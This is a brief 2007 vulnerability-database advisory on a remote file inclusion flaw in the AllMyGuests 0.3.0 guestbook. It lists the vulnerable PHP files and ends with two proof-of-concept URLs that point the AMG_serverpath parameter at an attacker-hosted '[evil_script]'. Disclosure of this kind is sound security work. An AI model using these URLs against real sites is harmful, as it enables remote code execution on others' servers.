AllMyGuests <= 0.3.0 (AMG_serverpath) Remote Inclusion Vulnerabilities

2007-01-08T00:00:00
ID SSV:5970
Type seebug
Reporter Root
Modified 2007-01-08T00:00:00

Description

No description provided by source.

                                        
                                            
                                                AllMyGuests 3.0 Remote File Inclusion Vulnerability

#Software: AllMyGuests

#Version: 3.0

#Download: http://download.php-resource.net/AllMyGuests/AllMyGuests0.3.0.zip

#Found By: beks

#Bug In:

/include/submit.inc.php
/admin/index.php
/include/cm_submit.inc.php
/comments.php
/index.php
/signin.php

#Risk: Medium

http://[target]/[AllMyGuests_Path]/comments.php?AMG_serverpath=[evil_script]
http://[target]/[AllMyGuests_Path]/signin.php?sent=1&AMG_serverpath=[evil_script]